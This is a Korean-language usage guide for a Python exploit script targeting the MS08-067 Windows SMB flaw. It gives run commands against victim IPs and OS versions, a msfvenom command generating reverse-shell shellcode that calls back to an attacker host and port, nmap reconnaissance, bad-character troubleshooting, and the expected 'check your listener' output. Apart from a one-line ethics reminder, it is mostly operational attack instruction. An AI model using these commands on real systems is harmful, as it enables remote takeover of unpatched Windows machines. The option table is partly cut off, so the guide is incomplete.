종합 사용 가이드: # 향상된 MS08-067 Exploit
📌 기본 사용법
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]
🎯 실전 예제
1. Windows XP SP0/SP1 (기본 포트 445)
python3 Exploit_MS08-067.py 192.168.1.100 1
2. Windows 2003 SP1 영어 (포트 139)
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139
3. 사용자 지정 Shellcode 사용
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
🔍 필수 매개변수
| 매개변수 | 설명 | 허용 값 |
|---|
IP_VÍCTIMA | 대상 IP | 모든 IPv4 |
VERSIÓN_OS | 취약한 OS 버전 | 1-7 (표 참조) |
📋 지원 OS 버전 표
| 값 | 운영체제 | 아키텍처 |
|---|
| 1 | Windows XP SP0/SP1 범용 | x86 |
| 2 | Windows 2000 범용 | x86 |
| ... | ... | ... |
⚙️ 추가 옵션
| 옵션 | 설명 | 기본값 |
|---|
-p/--port | SMB 포트 (445/139) | 445 |
-t/--timeout |
🛠️ msfvenom으로 Shellcode 생성
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows
🔎 대상 식별
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>
🚨 일반적인 문제 해결
오류: STATUS_OBJECT_NAME_NOT_FOUND
-
Browser 서비스가 활성화되어 있는지 확인하세요:
nmap -p 445 --script smb-enum-shares <IP>
-
다른 파이프를 사용해 보세요 (스크립트 수정):
# Cambiar \\pipe\\browser por \\pipe\\srvsvc
Shellcode가 실행되지 않는 경우
- 금지 문자 확인:
\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
- 검증을 위해 다음 명령어를 사용하세요:
msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
💡 윤리적 권장사항
✅ 승인된 환경에서만 사용할 것
❌ 허가 없이 프로덕션 시스템에는 절대 사용하지 말 것
📊 기대되는 성공 출력
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!
⚠️ 참고: 이 익스플로잇은 MS08-067 보안 공지로 패치된 시스템에서는 작동하지 않습니다.